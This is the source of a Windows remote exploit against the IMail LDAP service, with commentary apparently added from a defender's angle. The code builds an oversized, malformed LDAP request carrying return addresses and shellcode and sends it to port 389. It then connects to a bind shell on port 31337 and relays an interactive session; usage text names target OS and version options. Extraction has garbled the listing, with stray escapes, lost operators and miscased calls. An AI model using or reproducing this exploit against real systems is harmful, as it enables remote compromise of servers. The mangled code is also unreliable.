/*****************************************************************************/
/* THC imail 0.1 - Wind0wZ remote root exploit                               */
/* Exploit by: Johnny Cyberpunk ([email protected])                          */
/* THC PUBLIC SOURCE MATERIALS                                               */
/*                                                                           */
/* Bug was found by idefense or some idefense slaves ;)                      */
/* http://www.idefense.com/application/poi/display?id=74&type=vulnerabilities */
/*                                                                           */
/* compile with MS Visual C++: cl THCimail.c                                 */
/*                                                                           */
/* At least some greetz fly to: THC, Halvar Flake, FX, gera, MaXX, dvorak,   */
/* scut, stealth, FtR and Random                                             */
/*****************************************************************************/
#include
#include
#include
#include
#pragmacomment(lib,"ws2_32.lib")
/* Per-OS 4-byte return addresses; main() appends the one selected by argv[2]
 * directly after the "jumper" bytes. Fixed values like these, together with
 * the payload below, are what a network signature for this tool keys on. */
char*WIN2KEN="\xc4\x2a\x02\x75";
char*WIN2KPG="\xc4\x2a\xf9\x74";
char*WINXPSP1G="\xfe\x63\xa1\x71";
/* Four bytes placed between the version-dependent filler and the address.
 * NOTE(review): several escapes in this listing appear with an uppercase
 * "\X", so byte values transcribed from here should be treated as
 * approximate when used as indicators. */
#definejumper"\xeb\X06\x4a\X43"
/* Leading bytes of the message. 0x30 0x82 is a BER SEQUENCE with a two-byte
 * length, consistent with LDAP framing for the TCP/389 target in main(). The
 * INTEGER following the 0x60 (BindRequest) header carries a length byte of
 * 0xff, which is not a well-formed BER length here — presumably the
 * malformed field the advisory in the file header describes; confirm. */
charldapshit[]="\x30\x82\x0a\x3d\x02\x01\x01\x60\x82\x01\x36\x02\xff\xff\xff\xff\x20";
/* Stage-two payload appended after the return address. main() later connects
 * to TCP/31337 on the target, so presumably these bytes open a listener on
 * that port; they are not analysed here. */
charshellcode[]=
"\x8b\x7c\x24\xfc\x83\xc7\x21\x33\xc9\xb2\x8f\x66\x81\xc1\x02"
"\x02\x8a\x1f\x32\xda\x88\x1f\x47\xe2\xf7\x64\xac\xf5\xe6\x8d"
"\x8a\xe3\xd6\x77\x92\x13\x51\x03\x5e\xc3\xff\x5b\x8c\x7f\xa8"
"\xaf\xaf\XBF\x87\xd8\xdc\xbd\xd0\xbc\xbd\xa1\xcb\xc3\xc3\x8e"
"\x64\x8a\x67\x76\x70\x70\x70\xd2\x0c\x62\xa5\xe5\xbf\xd6\xeb"
"\x04\x8e\x04\xcf\x83\x04\xff\x93\x22\x04\xf7\x87\x02\xd0\xb3"
"\x04\x94\x8e\x74\x04\xd4\xf7\x8e\x74\x04\xc4\x93\x8e\x76\x04"
"\xdc\xab\x8e\x75\xdc\XDE\xdd\x04\xd4\xaf\x8e\x74\xbe\x46\xce"
"\xbe\x4f\x16\x04\xbb\x04\x8e\x71\x23\xbe\x4d\x5e\x6d\x0b\x4f"
"\xfa\x78\x80\x39\xca\x8a\x02\xcb\xca\x8b\xe9\xb6\x9f\xfa\x6e"
"\xe9\xbe\x9f\xd5\xd7\xd1\xd9\xdf\xdd\xa4\xc1\x9f\xce\x80\x38"
"\x83\xc5\x04\x8b\x07\x8e\x77\x80\x39\xc2\x8a\x06\xcb\x02\x57"
"\x71\xc2\x8a\xfa\x31\x71\xc2\x8b\xfb\xae\x71\xc2\xad\x02\xd2"
"\x97\xdc\x70\x5f\x06\x48\xe5\x8b\xd7\x07\xca\x8a\x0f\xca\xf8"
"\x85\x02\xd2\xfb\x0f\xe4\xa9\x9b\x66\xf7\x70\x70\x70\x06\x41"
"\xbe\x54\xdc\xdc\xdc\xdc\xd9\xc9\xd9\x70\x5f\x18\xda\xd7\xe9"
"\x06\xbf\xe5\x9f\xda\xd8\x70\xda\x5b\xc1\xd9\xd8\x70\xda\x43"
"\xdc\xda\xd8\x70\xda\x5f\x18\x02\xca\x07\xdf\x70\xda\x6b\xda"
"\xda\x70\xda\x67\x02\xcb\x8a\x83\x1b\xdc\xe7\xa1\xea\xf7\xea"
"\xe7\xd3\XEC\xe2\xeb\x1b\xbe\x5d\x02\xca\x43\x1b\xd8\xd8\xd8"
"\xdc\xdc\x71\x49\x8e\x7d\xdd\x1b\x02\xca\xf7\xdf\x02\xca\x07"
"\xdf\x3e\x87\xdc\xdc\xe5\x9f\x71\x41\xdd\xdc\xdc\xdc\xda\x70"
"\xda\x63\xe5\x70\x70\xda\x6f";
/* Forward declarations for the helpers defined after main(). */
voidusage();
voidshell(intsock);
/*
 * Entry point. Assembles one fixed-size (2650-byte) message shaped like an
 * LDAP request, delivers it to TCP/389 on argv[1], pauses one second, then
 * tries TCP/31337 on the same host and hands that socket to shell().
 *
 * argv[1] = target host name or dotted IP
 * argv[2] = OS index (see usage())
 * argv[3] = IMail version index (see usage())
 *
 * Defender's view: the observable sequence is an LDAP connection whose first
 * PDU is oversized and malformed, followed about a second later by an inbound
 * connection to port 31337 on the target. Both are detection points; the
 * durable mitigation is the vendor fix referenced in the file header and not
 * exposing the IMail LDAP service beyond the hosts that need it.
 *
 * NOTE(review): this listing lost its whitespace and some identifier casing
 * in extraction; the code lines below are left exactly as found.
 */
intmain(intargc,char*argv[])
{
unsignedinti,sock,sock2,addr,os,ver,rc,IMAILVER;
unsignedchar*finalbuffer,*crapbuf1,*crapbuf2;
/* Filler lengths that differ per IMail build; one is chosen by argv[3]. */
unsignedintIMAIL6_7=60;
unsignedintIMAIL_8=68;
structsockaddr_inmytcp;
structhostent*hp;
WSADATAwsaData;
printf("\nTHCimailv0.1-ImailLDAPexploit\n");
printf("testedonImail6-8\n");
printf("byJohnnyCyberpunk");
/* Argument-count guard; the comparison operator was lost in extraction. */
if(argc4)
usage();
/* argv[3]: IMail version index -> filler length. No range check beyond the
 * switch default, which prints a message and exits. */
ver=(unsignedshort)atoi(argv[3]);
switch(ver)
{
case0:
IMAILVER=IMAIL6_7;
break;
case1:
IMAILVER=IMAIL_8;
break;
default:
printf("\nYouenteredanillegalversion!\n\n");
usage();
Exit(-1);
}
/* Three heap buffers: IMAILVER bytes of 'X', 2220 bytes of 'X', and the
 * 2650-byte message that is concatenated together below. */
crapbuf1=malloc(IMAILVER);
memset(crapbuf1,'X',IMAILVER);
printf("imailver=%d\n",IMAILVER);
crapbuf2=malloc(2220);
memset(crapbuf2,'X',2220);
finalbuffer=malloc(2650);
memset(finalbuffer,0,2650);
printf("\n[*]buildingbuffer\n");
/* Message layout: BER/LDAP header, version-dependent filler, jumper bytes,
 * OS-specific address, payload, trailing filler. The fixed layout is what
 * makes the traffic signature-able. */
strcat(finalbuffer,ldapshit);
strcat(finalbuffer,crapbuf1);
strcat(finalbuffer,jumper);
/* argv[2]: OS index -> which address constant is appended. Note cases 0 and
 * 1 both append WIN2KPG; WIN2KEN is never used in this listing. */
os=(unsignedshort)atoi(argv[2]);
switch(os)
{
case0:
strcat(finalbuffer,WIN2KPG);
break;
case1:
strcat(finalbuffer,WIN2KPG);
break;
case2:
strcat(finalbuffer,WINXPSP1G);
break;
default:
printf("\nYouenteredanillegalOS!\n\n");
usage();
exit(-1);
}
strcat(finalbuffer,shellcode);
strcat(finalbuffer,crapbuf2);
/* Winsock initialisation (Windows-only tool, see the ws2_32 pragma above). */
if(WSASTARTUP(MAKEWORD(2,1),&wsaData)!=0)
{
printf("WSAStartupfailed!\n");
exit(-1);
}
/* Resolve argv[1] by name first, then as a dotted address. */
hp=gethostbyname(argv[1]);
if(!hp){
addr=inet_addr(argv[1]);
}
if((!hp)&&(addr==INADDR_NONE))
{
printf("Unabletoresolve%s\n",argv[1]);
exit(-1);
}
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(!sock)
{
printf("socket()error...\n");exit(-1);
}
if(hp!=NULL)
memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
else
mytcp.sin_addr.s_addr=addr;
if(hp)
mytcp.sin_family=hp->h_addrtype;
else
mytcp.sin_family=AF_INET;
/* First connection: the LDAP service on TCP/389. */
mytcp.sin_port=htons(389);
printf("[*]connectingthetarget\n");
rc=connect(sock,(structsockaddr*)&mytcp,sizeof(structsockaddr_in));
if(rc==0)
{
/* Always sends the full 2650 bytes regardless of how much strcat() filled;
 * the one-second pause before the next step is itself a timing indicator. */
send(sock,finalbuffer,2650,0);
printf("[*]Exploitsendsuccessfully!Sleepingawhile....\n");
Sleep(1000);
}
else
printf("\nCan'tconnecttoldapport!\n");
if(rc==0)
{
/* Second connection: TCP/31337 on the same address, expected to be opened
 * by the payload (presumably; not verified here). A host that accepts this
 * port right after an LDAP session is a strong compromise indicator. */
printf("[*]Tryingtogetashell\n\n");
sock2=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
mytcp.sin_port=htons(31337);
rc=connect(sock2,(structsockaddr*)&mytcp,sizeof(mytcp));
if(rc!=0)
{
printf("can'tconnecttoport31337;(maybefirewalled...\n");
exit(-1);
}
shell(sock2);
}
/* Tear down the LDAP socket and release the buffers; sock2 is not closed. */
shutdown(sock,1);
closesocket(sock);
free(crapbuf1);
free(crapbuf2);
free(finalbuffer);
exit(0);
}
/*
 * Prints the command-line help (target, OS index, IMail version index) and
 * terminates the process with status 0. Called from main() on bad arguments.
 * The local `a` is unused in the original and is left as found.
 */
voidusage()
{
unsignedinta;
printf("\nUsage:\n");
printf("Sample:THCimail194.44.55.5601\n\n");
printf("OS:\n");
printf("0-Windows2000Serverenglishallservicepacks\n");
printf("1-Windows2000Professionalgerman\n");
printf("2-WindowsXPSP1german\n\n");
printf("ImailVersion:\n");
printf("0-Imail6+7\n");
printf("1-Imail8\n");
exit(0);
}
/*
 * Interactive relay between the console and an already-connected socket.
 * Each pass waits up to one second for data on the socket; if some arrives it
 * is copied to stdout, otherwise one read from stdin is sent to the socket.
 * Returns (after printing "byebye...") as soon as either direction reports
 * EOF or an error.
 *
 * The two-element array passed as the fd_set relies on the Windows fd_set
 * layout (element count followed by the socket handles) — presumably; confirm
 * against winsock2.h. Nothing in this loop is encrypted, so the complete
 * session is recoverable from a packet capture — useful for forensics.
 */
voidshell(intsock)
{
intl;
charbuf[1024];
structtimevaltime;
unsignedlongul[2];
/* One-second poll interval, set once and reused every iteration. */
time.tv_sec=1;
time.tv_usec=0;
while(1)
{
/* Hand-built single-socket fd_set: count, then the handle. */
ul[0]=1;
ul[1]=sock;
l=select(0,(fd_set*)&ul,NULL,NULL,&time);if(l==1)
{
/* Socket readable: copy up to 1024 bytes to stdout. */
l=recv(sock,buf,sizeof(buf),0);
if(l<=0)
{
printf("byebye...\n");
return;
}
l=write(1,buf,l);
if(l<=0)
{
printf("byebye...\n");
return;
}
}
else
{
/* Nothing from the socket: forward one stdin read to the socket. */
l=read(0,buf,sizeof(buf));
if(l<=0)
{
printf("byebye...\n");
return;
}
l=send(sock,buf,l,0);
if(l<=0)
{
printf("byebye...\n");
return;
}
}
}
}